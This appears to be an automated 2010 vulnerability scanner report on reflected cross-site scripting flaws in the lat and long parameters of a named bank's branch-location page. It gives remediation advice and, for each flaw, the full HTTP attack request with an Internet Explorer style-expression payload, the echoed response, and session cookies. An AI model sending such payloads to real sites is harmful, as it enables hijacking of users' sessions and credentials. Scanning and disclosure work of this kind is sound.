Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the lat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f18bc"style%3d"x%3aexpression(alert(1))"c78c2c9d7f7 was submitted in the lat parameter. This input was echoed as f18bc"style="x:expression(alert(1))"c78c2c9d7f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /locations/displaylocation.aspx?lat=41.785209f18bc"style%3d"x%3aexpression(alert(1))"c78c2c9d7f7&long=-88.282002&loc=12 HTTP/1.1 Host: www.oldsecond.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.oldsecond.com/locations/branches.aspx Cookie: __utmz=262476626.1286815344.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=262476626.1207384970.1286815344.1286815344.1286815344.1; __utmc=262476626; __utmb=262476626.2.10.1286815344; ASP.NET_SessionId=pjiu0245lagh00qt4sxulnqv;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 11 Oct 2010 16:46:17 GMT Content-Length: 5233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vm ...[SNIP]... <input id="lat" type="hidden" value="41.785209f18bc"style="x:expression(alert(1))"c78c2c9d7f7" /> ...[SNIP]...
The value of the long request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d3b"style%3d"x%3aexpression(alert(1))"fa0e3b73e3c was submitted in the long parameter. This input was echoed as 45d3b"style="x:expression(alert(1))"fa0e3b73e3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /locations/displaylocation.aspx?lat=41.785209&long=-88.28200245d3b"style%3d"x%3aexpression(alert(1))"fa0e3b73e3c&loc=12 HTTP/1.1 Host: www.oldsecond.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.oldsecond.com/locations/branches.aspx Cookie: __utmz=262476626.1286815344.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=262476626.1207384970.1286815344.1286815344.1286815344.1; __utmc=262476626; __utmb=262476626.2.10.1286815344; ASP.NET_SessionId=pjiu0245lagh00qt4sxulnqv;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 11 Oct 2010 16:46:22 GMT Content-Length: 5233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vm ...[SNIP]... <input id="long" type="hidden" value="-88.28200245d3b"style="x:expression(alert(1))"fa0e3b73e3c" /> ...[SNIP]...
Report generated by XSS.CX at Mon Oct 11 11:53:44 CDT 2010.